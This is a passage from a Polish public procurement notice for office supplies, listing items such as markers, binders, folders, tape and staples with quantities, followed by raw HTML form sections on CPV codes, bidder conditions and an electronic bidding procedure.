mm, kolor czerwony	szt.	80,59- pisak do tablic suchościeralnych, z okrągłą końcówką, z płynnym tuszem dozowanym za pomocą specjalnej pompki, długość linii pisania min.1000 m, grubość końcówki do 4 mm, kolor niebieski	szt.	80,60- pisak do tablic suchościeralnych, z okrągłą końcówką, z płynnym tuszem dozowanym za pomocą specjalnej pompki, długość linii pisania min.1000 m, grubość końcówki do 4 mm, kolor zielony	szt.	80,61- pisak do tablic suchościeralnych, z okrągłą końcówką, z płynnym tuszem dozowanym za pomocą specjalnej pompki, długość linii pisania min.1000 m, grubość końcówki do 4 mm, (kpl. 4 kolory), w zestawie z gąbką.	kpl.	100,62- nożyczki o długości 16cm, wysokiej jakości ostrze ze stali nierdzewnej, ergonomiczna rękojeść z niełamliwego czarnego plastiku, w jednostkowym tekturowym opakowaniu na blistrze	szt.	200,63- naboje atramentowe do pióra typu Parker, długie, kolor niebieski (op.kartonowe 5 szt)	op.	50,64- nóż z ostrzem łamanym 18 mm, korpus wykonany ze stali nierdzewnej pokryty miękkim tworzywem, mocna śrubowa blokada zwiększająca bezpieczeństwa pracy, w komplecie zapasowe ostrze	szt.	150,65- nóż z ostrzem łamanym 9 mm, korpus wykonany ze stali nierdzewnej pokryty miękkim tworzywem, mocna śrubowa blokada zwiększająca bezpieczeństwa pracy, w komplecie zapasowe ostrze	szt.	150,66- okładki do bindownicy A4 przezroczyste, grubość min. 200 mic (op. 100 szt)	op.	200,67- okładki do bindownicy A4, spód - karton o gramaturze min. 250 g/m2, kolor czarny i niebieski, (op. 100 szt.)	op.	200,68- ołówek automatyczny, w nieprzezroczystej jednokolorowej obudowie, o przekroju trójkąta, wyposażony w wysuwający się mechanizm zaciskowy oraz gumkę, linia pisania 0,7mm, nazwa producenta, typ oraz grubość podana na korpusie	szt.	200,69- ołówek drewniany z gumką, z elastycznym grafitem o średnicy 2 mm odpornym na złamania, twardość HB, nazwa producenta, typ oraz twardość podana na korpusie	szt.	250,70- papier samoprzylepny A4, do drukarki atramentowej i laserowej, gramatura papieru min. 80 g/m2, (op. 20 szt.), kolor czerwony ciemny op.	50,71- papier samoprzylepny A4, do drukarki atramentowej i laserowej, gramatura papieru min. 80 g/m2, (op. 20 szt.), kolor niebieski ciemny	op.	50,72- papier samoprzylepny A4, do drukarki atramentowej i laserowej, gramatura papieru min. 80 g/m2, (op. 20 szt.), kolor żółty jasny	op.	50,73- podajnik biurkowy do taśmy klejącej o szerokości 19 mm, z obciążoną podstawą zapewniającą stabilność podczas użytkowania, posiadający podstawę antypoślizgową zapobiegającą przesuwaniu się jego po biurku szt.	50,74- poduszka do stempli o wymiarach 117x70 mm, nasączona - kolor czerwony	szt.	30,75- poduszka do stempli o wymiarach 117x70 mm, nasączona - kolor czarny	szt.	30,76- półka na dokumenty przezroczysta lekka, specjalne miejsce na klips opisowy z etykietą, możliwość ustawiania szufladek jedna na drugiej szt.	150,77- przekładki polipropylenowe, A4, z oznaczeniem alfabetycznym od A do Z, z kartą informacyjno-opisową, kolor szary	op.	50,78- przekładki polipropylenowe, A4, z oznaczeniem numerycznym od 1 do 10, z kartą informacyjno-opisową, kolor szary	op.	50,79- przekładki polipropylenowe, A4, z oznaczeniem numerycznym od 1 do 31, z kartą informacyjno-opisową, kolor szary	op.	30,80- segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 5 cm, z grubego kartonu, okleina z poliolefiny, z dwustronną etykietą, dolne krawędzie wzmocnione niklowanymi okuciami, na grzbiecie wzmocniony otwór na palec, kolor czerwony szt.	150,81- segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 7,5 cm, z grubego kartonu, okleina z poliolefiny, z dwustronną etykietą, dolne krawędzie wzmocnione niklowanymi okuciami, na grzbiecie wzmocniony otwór na palec, kolor czerwony szt.	200,82- segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 7,5 cm, z grubego kartonu, okleina z poliolefiny, z dwustronną etykietą, dolne krawędzie wzmocnione niklowanymi okuciami, na grzbiecie wzmocniony otwór na palec, kolor niebieski	szt.	300,83- segregator A4 z mechanizmem dźwigniowym, szer. grzbietu 7,5 cm, z grubego kartonu, okleina z poliolefiny, z dwustronną etykietą, dolne krawędzie wzmocnione niklowanymi okuciami, na grzbiecie wzmocniony otwór na palec, kolor czarny	szt.	60,84- skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, przednia okładka przezroczysta, tylna czerwona szt.	200,85- skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, przednia okładka przezroczysta, tylna niebieska szt.	200,86- skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, przednia okładka przezroczysta, tylna szary	szt.	100,87- skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, przednia okładka przezroczysta, tylna zielona	szt.	100,88- skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, przednia okładka przezroczysta, tylna żółta	szt.	100,89- skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna czerwona szt.	200,90- skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna niebieska	szt.	200,91- skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna szara	szt.	100,92- skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna zielona	szt.	100,93- skoroszyt A4, ze sztywnego PCV o grubości min. 150 mic, z białym paskiem opisowym na zamknięciu, z otworami umożliwiającymi wpięcie do segregatora, przednia okładka przezroczysta, tylna żółta	szt.	100,94- Taśma dwustronna piankowa, szerokość 18 mm, długość 3 m, kolor biały	szt.	150,95- taśma klejąca, 19 mm x 33 m, wykonana z folii, grubość min. 60 mic, wytrzymała na rozciąganie (min 25%), matowa, w opakowaniu pojedynczym kartonowym, niewidoczna na fotokopiach po naklejeniu, nie żółknąca z czasem, z możliwością pisania po niej	szt.	100,96- taśma klejąca dwustronna - piankowa, szer. 19 mm, (tolerancja +/- 1mm), długość 3 m, grubość: 1 mm (tolerancja + 0,5mm), biała, wzmocniona powłoka ochronna na starzenie, klej odporny na działanie światła	szt.	50,97- taśma klejąca dwustronna, 38 mm x 10 m, pokryta obustronnie emulsyjnym klejem akrylowym, zabezpieczona warstwą papieru (tolerancja +/- 1 mm dla szerokości i +/- 1 m dla długości)	szt.	50,98- taśma klejąca, 19 mm x 33 m, przezroczysta, w opakowaniu jednostkowym zabezpieczonym folią	szt.	700,99- taśma klejąca, 24 mm x 20 m, przezroczysta (tolerancja +/- 1 m dla długości)	szt.	150,100- taśma pakowa, kolor - przezroczysta, rozmiar min. 48 mm x 60 m (tolerancja +/- 1 m dla długości)	szt.	100,101- taśma pakowa, kolor - brąz, rozmiar min. 48 mm x 60 m (tolerancja +/- 1 m dla długości)	szt.	50,102- teczka na dokumenty z gumką, format A4, jednostronnie powlekana folią polipropylenową, tektura min. 400g/m2, grzbiet do 20 mm, różne kolory	szt.	500,103- teczka kartonowa posiadająca uchwyty umożliwiające jej zawieszenie, format A4. Kolor czerwony i zielony po równo każdego z kolorów	szt.	150,104- teczka do podpisu A4/10 - na przedniej okładce otwierane okienko do opisu zawartości, posiadająca otwory (min. 2) do podglądu zawartości w przegródce, kolor czerwony	szt.	50,105- teczka do podpisu A4/10 - na przedniej okładce otwierane okienko do opisu zawartości, posiadająca otwory (min. 2) do podglądu zawartości w przegródce, kolor granatowy	szt.	150,106- teczka na dokumenty z gumką, formatu A4, jednostronnie powleka folią polipropylenową, tektura min. 400 g/m2, grzbiet do 20 mm, różne kolory	szt.	500,107- teczka - deska z klipsem, z dwiema okładkami sztywnymi, format A4, z wewnętrzną kieszenią na notatki, wizytówki, z uchwytem na długopis, różne kolory	szt.	150,108- teczka harmonijkowa z min. 12 kieszeniami z indeksami, dostosowanymi do dokumentów formatu A4, wykonana z polipropylenu o grubości : przód min. - 175um, tył min. - 600um zamykana za pomocą gumki - różne kolory	szt.	100,109- teczka harmonijkowa z min. 12 kieszeniami z indeksami, dostosowanymi do dokumentów formatu A4, zamykana na zatrzask, na górnym grzbiecie rączka do przenoszenia, wykonana z polipropylenu o grubości min. 0,67 mm - różne kolory	szt.	100,110- teczka z rączką A4/40-50 mm kolor czarny i niebieski w równych ilościach	szt.	150,111- teczka z rączką A4/80-90 mm kolor czarny i niebieski w równych ilościach	szt.	250,112- dwuotworowa temperówka plastikowa z pojemnikiem i pokrywką zabezpieczającą, potrójnie mocowane stalowe ostrze pokryte cynkiem, dwukolorowa, szt.	350,113- pinezki kolorowe beczułki do tablic, op. 50 szt.	op.	200,114- pinezki metalowe, op. 50 szt.	op.	50,115- wkład do długopisu marki Waterman, długość wkładu 11,2 cm,opakowany w przezroczystą tulejkę z tworzywa sztucznego, zabezpieczająca go przed wyschnięciem	szt.	50,116- wkład do cienkopisu z poz. 7	szt.	350,117- wkład do cienkopisu z poz. 8	szt.	200,118- wkład do cienkopisu z poz. 9	szt.	300,119- wkład do cienkopisu automatycznego Pilot - kolor niebieski	szt.	150,120- wkład do długopisu typu Parker, kolor niebieski F	szt.	100,121- zakładki indeksujące 12 x 43 mm (+/-1mm) , samoprzylepne, neonowe, z możliwością wielokrotnego odklejania i przyklejania, do użytku z pojemnikiem 3M 680-ISK, (op. 4x35 szt.), 4 kolorowe, każdy kolor w dyspenserku.	op.	250,122- zakładki indeksujące 25x43mm, samoprzylepne foliowe, z możliwością wielokrotnego odklejania i przyklejania,do użytku z pojemnikiem 3M 680-ISK (op. 50 szt.), różne kolory, każdy kolor w dyspenserku.	op.	250,123- zakreślacz z fluorescencyjnym z tuszem pigmentowym, z formułą gwarantującą bezpieczeństwo wydruków atramentowych, płaski ze ściętą końcówką, szerokość linii pisania 1-5 mm, nazwa producenta, logo, kraj wyprodukowania oraz numer artykułu i kod kreskowy na obudowie (kpl. 4 kol. w fabrycznym etui).	kpl.	100,124- zakreślacz z fluorescencyjnym z tuszem pigmentowym, z formułą gwarantującą bezpieczeństwo wydruków atramentowych, płaski ze ściętą końcówką, szerokość linii pisania 1-5 mm, nazwa producenta, logo, kraj wyprodukowania oraz numer artykułu i kod kreskowy na obudowie (kpl. 8 kol. w fabrycznym etui).	kpl.	100,125- zeszyt (brulion) w kratkę A5, 32 kartkowy, miękka lakierowana okładka, gramatura kartek min. 60 g/m2	szt.	1000,126- zeszyt (brulion) w kratkę A5, 96 kartkowy, szyty i klejony, laminowana okładka, gramatura kartek min. 60 g/m2	szt.	200,127- zeszyt (brulion) w kratkę A4, 192 kartkowy, szyty i klejony, laminowana okładka, gramatura kartek min. 60 g/m2	szt.	100,128- zeszyt (brulion) w kratkę A5, 160 kartkowy, szyty i klejony, laminowana okładka, gramatura kartek min. 60 g/m2	szt.	160,129- zszywacz z ergonomicznym uchwytem i technologią Dairect Impact, metalowy w plastikowej obudowie zszywający minimum 30 kartek, rodzaj psujcych zszywek 24/6 i 26/6, w kartonowym opakowaniu.	szt.	200,130- zszywki 24/6, stalowe - galwanizowane elektrycznie, o dużej twardości i odporności na rozciąganie, ocynkowane (op.1000 szt.), op.	1000,131- zszywki 23/8, stalowe - galwanizowane elektrycznie, o dużej twardości i odporności na rozciąganie, ocynkowane (op.1000 szt.), op.	60,132- zszywki 23/10, stalowe - galwanizowane elektrycznie, o dużej twardości i odporności na rozciąganie, ocynkowane (op.1000 szt.), op.	60,</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">30190000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22852000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22816300-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30199230-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22816000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>22851000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30197220-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192100-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192125-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192130-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192131-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30192160-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44174000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>24910000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30199410-7</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-07-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Na podstawie złożonego oświadczenia według załącznika nr 5 do ogłoszenia</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Przed podpisaniem umowy do każdego artykułu zawartego w umowie należy złożyć dokumenty potwierdzające spełnienie wymagań określonych w opisie przedmiotu zamówienia np; karty produktu, opis przedmiotu itp.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1) Wniosek o dopuszczenie do udziału w licytacji elektronicznej - załącznik nr 3,2) Oryginał lub kopię pełnomocnictwa dla osoby/osób podpisującej/ych wniosek o dopuszczenie do udziału w licytacji, gdy prawo do podpisania wniosku nie wynika z innych dokumentów,3) Wykonawca zobowiązany jest złożyć wypełniony dokument zawierający ceny, wartość, nazwę producenta, nazwę produktu nadaną przez producenta i numer katalogowy producenta, sumę która musi być identyczna z wylicytowaną kwotą.4) Oświadczenie według załącznika nr 5 do ogłoszenia5) Oświadczenie według załącznika nr 6 do ogłoszenia</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Licytacja elektroniczna</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie 